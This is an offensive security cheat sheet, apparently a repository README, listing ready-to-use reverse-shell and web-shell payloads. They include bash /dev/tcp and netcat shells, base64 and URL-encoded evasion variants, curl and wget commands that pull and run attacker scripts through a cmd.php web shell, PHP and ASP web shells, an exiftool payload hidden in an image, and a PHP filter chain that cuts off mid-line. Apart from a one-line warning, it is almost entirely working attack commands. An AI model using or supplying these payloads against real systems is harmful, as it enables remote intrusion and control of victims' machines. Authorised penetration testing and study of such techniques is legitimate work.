Offensive Reverse Shell (Cheat Sheet)

</br>

Welcome to the Offensive Reverse Shell (Cheat Sheet), a comprehensive repository curated specifically for Red Team Operations, Penetration Testing, and Security Research. This repository contains a variety of reverse shell payloads crafted in different languages and configurations to suit diverse scenarios and environments.

[!WARNING] All content in this repository is intended strictly for educational purposes and authorized security testing in controlled environments only, whether real or CTF.

Table of Contents

• Bash
• Netcat
  • Netcat Linux
  • Netcat Windows
• cURL
• Wget
• Node-RED
• WebShells
  • Exif Data
  • ASP WebShell
  • PHP WebShell
    • GET
    • POST
    • Chain Filter
    • Log Poisoning WebShell
      • SSH
      • FTP
      • HTTP
      • RSYNC
• Server Side Template Injection (SSTI)</kbd>
• UnrealIRCd</kbd>
• Exif Data</kbd>
• Shellshock</kbd>
  • SSH
  • HTTP
    • HTTP 500 Internal Server Error
• CMS
  • WordPress
  • October
  • Jenkins
    • Windows
    • Linux
• Perl
• Python
• Python3
• PHP
• Ruby
• Xterm
• Ncat
• Socat
• PowerShell
• Awk
• Gawk
• Golang
• Telnet
• Java
• Node
• Msfvenom
  • Web Payloads
    • PHP
    • WAR (Tomcat)
    • JAR
    • JSP
    • ASPX
  • Linux Payloads
    • Listener Netcat
    • Listener Metasploit Multi Handler
  • Windows Payloads
    • Listener Netcat
    • Listener Metasploit Multi Handler

---

<kbd>Bash</kbd>

<kbd>TCP</kbd>

<kbd>-i</kbd>

#sh
sh -i >& /dev/tcp/192.168.1.2/443 0>&1
/bin/sh -i >& /dev/tcp/192.168.1.2/443 0>&1
#bash
bash -i >& /dev/tcp/192.168.1.2/443 0>&1
/bin/bash -i >& /dev/tcp/192.168.1.2/443 0>&1

<kbd>196</kbd>

#sh
0<&196;exec 196<>/dev/tcp/192.168.1.2/443; sh <&196 >&196 2>&196
0<&196;exec 196<>/dev/tcp/192.168.1.2/443; /bin/sh <&196 >&196 2>&196
#bash
0<&196;exec 196<>/dev/tcp/192.168.1.2/443; bash <&196 >&196 2>&196
0<&196;exec 196<>/dev/tcp/192.168.1.2/443; /bin/bash <&196 >&196 2>&196

<kbd>read line</kbd>

exec 5<>/dev/tcp/192.168.1.2/443;cat <&5 | while read line; do $line 2>&5 >&5; done

<kbd>5</kbd>

#sh
sh -i 5<> /dev/tcp/192.168.1.2/443 0<&5 1>&5 2>&5
/bin/sh -i 5<> /dev/tcp/192.168.1.2/443 0<&5 1>&5 2>&5
#bash
bash -i 5<> /dev/tcp/192.168.1.2/443 0<&5 1>&5 2>&5
/bin/bash -i 5<> /dev/tcp/192.168.1.2/443 0<&5 1>&5 2>&5

<kbd>-c</kbd>

bash -c 'bash -i >& /dev/tcp/192.168.1.2/443 0>&1'
#basic url encode
bash -c 'bash -i >%26 /dev/tcp/192.168.1.2/443 0>%261'
#full url encode
bash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.1.2%2F443%200%3E%261%27

<kbd>UDP</kbd>

#sh
sh -i >& /dev/udp/192.168.1.2/443 0>&1
/bin/sh -i >& /dev/udp/192.168.1.2/443 0>&1
#bash
bash -i >& /dev/udp/192.168.1.2/443 0>&1
/bin/bash -i >& /dev/udp/192.168.1.2/443 0>&1

---

<kbd>Netcat</kbd>

<kbd>Netcat Linux</kbd>

<kbd>-e</kbd>

#sh
nc 192.168.1.2 443 -e sh
nc 192.168.1.2 443 -e /bin/sh
#bash
nc 192.168.1.2 443 -e bash
nc 192.168.1.2 443 -e /bin/bash

<kbd>-c</kbd>

#sh
nc -c sh 192.168.1.2 443
nc -c /bin/sh 192.168.1.2 443
#bash
nc -c bash 192.168.1.2 443
nc -c /bin/bash 192.168.1.2 443

<kbd>NO -e -c</kbd>

#1) create FIFO pipe (pipeline)
mknod /tmp/backpipe p
#2) reverse shell
/bin/sh 0</tmp/backpipe | nc 192.168.1.2 443 1>/tmp/backpipe

<kbd>BusyBox</kbd>

#sh
busybox nc 192.168.1.2 443 -e sh
busybox nc 192.168.1.2 443 -e /bin/sh
#bash
busybox nc 192.168.1.2 443 -e bash
busybox nc 192.168.1.2 443 -e /bin/bash
#not space
busybox+nc+192.168.1.2+443+-e+sh
busybox${IFS}nc${IFS}192.168.1.2${IFS}443${IFS}-e${IFS}sh

<kbd>fifo</kbd>

#sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.1.2 443 >/tmp/f
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.2 443 >/tmp/f
#bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 192.168.1.2 443 >/tmp/f
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.1.2 443 >/tmp/f
#url encode
rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20192.168.1.2%20443%20%3E%2Ftmp%2Ff

#base64
#atacker
base64 -w 0 <<< 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.2 443 >/tmp/f'
cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL3NoIC1pIDI+JjF8bmMgMTkyLjE2OC4xLjIgNDQzID4vdG1wL2YK
nc -lvnp 443
#victim
echo 'cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL3NoIC1pIDI+JjF8bmMgMTkyLjE2OC4xLjIgNDQzID4vdG1wL2YK' |base64 -d |sh
#or
http://192.168.1.3/cmd.php?cmd=echo 'cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL3NoIC1pIDI+JjF8bmMgMTkyLjE2OC4xLjIgNDQzID4vdG1wL2YK' |base64 -d |sh

---

<kbd>Netcat Windows</kbd>

nc.exe -e cmd 192.168.1.2 443
#smbserver
cp $(locate nc.exe) . && impacket-smbserver a $(pwd) -smb2support
\\192.168.1.2\a\nc.exe -e cmd 192.168.1.2 443

---

---

<kbd>cURL</kbd>

#atacker
echo "nc -e /bin/sh 192.168.1.2 443" > index.html && python3 -m http.server 80
nc -lvnp 443
#victim
http://192.168.1.3/cmd.php?cmd=curl 192.168.1.2/index.html|sh

---

<kbd>Wget</kbd>

#atacker
echo "nc -e /bin/sh 192.168.1.2 443" > index.html && python3 -m http.server 80
nc -lvnp 443
#victim
http://192.168.1.3/cmd.php?cmd=wget -qO- 192.168.1.2/index.html|sh

---

<kbd>Node-RED</kbd>

[{"id":"7235b2e6.4cdb9c","type":"tab","label":"Flow 1"},{"id":"d03f1ac0.886c28","type":"tcp out","z":"7235b2e6.4cdb9c","host":"","port":"","beserver":"reply","base64":false,"end":false,"name":"","x":786,"y":350,"wires":[]},{"id":"c14a4b00.271d28","type":"tcp in","z":"7235b2e6.4cdb9c","name":"","server":"client","host":"192.168.1.2","port":"443","datamode":"stream","datatype":"buffer","newline":"","topic":"","base64":false,"x":281,"y":337,"wires":[["4750d7cd.3c6e88"]]},{"id":"4750d7cd.3c6e88","type":"exec","z":"7235b2e6.4cdb9c","command":"","addpay":true,"append":"","useSpawn":"false","timer":"","oldrc":false,"name":"","x":517,"y":362.5,"wires":[["d03f1ac0.886c28"],["d03f1ac0.886c28"],["d03f1ac0.886c28"]]}]

---

<kbd>WebShells</kbd>

<kbd>Exif Data WebShell</kbd>

exiftool -Comment='<?php system($_GET['cmd']); ?>' filename.png
mv filename.png filename.php.png

<kbd>ASP WebShell</kbd>

<%response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall()%>

<kbd>PHP WebShell</kbd>

<kbd>Chain Filter</kbd>

http://192.168.1.2/file.php?file="paste chain filter"

php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16|convert.iconv.WINDOWS-1258.UTF32LE|convert.iconv.ISIRI3342.ISO-IR-157|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.BIG5.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.iconv.ISO-IR-103.850|convert.iconv.PT154.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.SJIS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.DEC.UTF-16|convert.iconv.ISO8859-9.ISO_6937-2|convert.iconv.UTF16.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500-1983.UCS-2BE|convert.iconv.MIK.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.icon